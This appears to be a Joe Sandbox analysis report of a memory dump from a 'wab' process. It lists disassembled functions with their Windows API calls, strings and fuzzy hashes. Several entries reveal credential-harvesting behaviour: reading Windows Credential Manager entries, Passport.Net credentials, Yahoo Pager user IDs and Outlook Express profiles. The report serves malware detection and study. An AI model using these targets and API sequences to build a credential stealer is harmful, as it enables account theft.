                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                                                    • String ID: XgD$rY@
                                                                                                                                                                                                                    • API String ID: 3502187192-1347721759
                                                                                                                                                                                                                    • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                    • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004062D9 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406376
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                                                      • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                                                      • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                                                      • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                                                      • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                                                      • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                                                      • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                    • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00443E22 Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                                                      • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                                                                                    • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                                    • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F057 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                      • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                    • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                                    • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004032A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                                                      • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                                                      • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                    • String ID: Personalities
                                                                                                                                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                    • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                                    • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004101D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                    • API String ID: 2859077140-3316789007
                                                                                                                                                                                                                    • Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                                    • Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00443A35 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                    • Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                                    • Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040900D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409031
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • {?@ UD, xrefs: 0040900D
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                                                                                    • API String ID: 408644273-2682877464
                                                                                                                                                                                                                    • Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                                    • Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406B15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                    • Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                                    • Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410909 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,76A071C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                                                                                    • Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                                    • Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0043D438 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 478COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID: $no query solution
                                                                                                                                                                                                                    • API String ID: 368790112-326442043
                                                                                                                                                                                                                    • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                    • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0043000F Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                    • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                    • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0043CB52 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                    • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                    • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041D3D8 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                    • API String ID: 231171946-3708268960
                                                                                                                                                                                                                    • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                    • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00424D44 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 173COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                    • Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                    • Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413F5C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                    • API String ID: 438689982-3457389245
                                                                                                                                                                                                                    • Opcode ID: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                                    • Instruction ID: 411cc920c71d47ae3c136763a4be7e00f30539a89a3c59ace8e577baf045dca9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9417F72A00209EBDF00CF95CC41ADE7BB5FF48315F14452AF614A7280D778DAA5CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

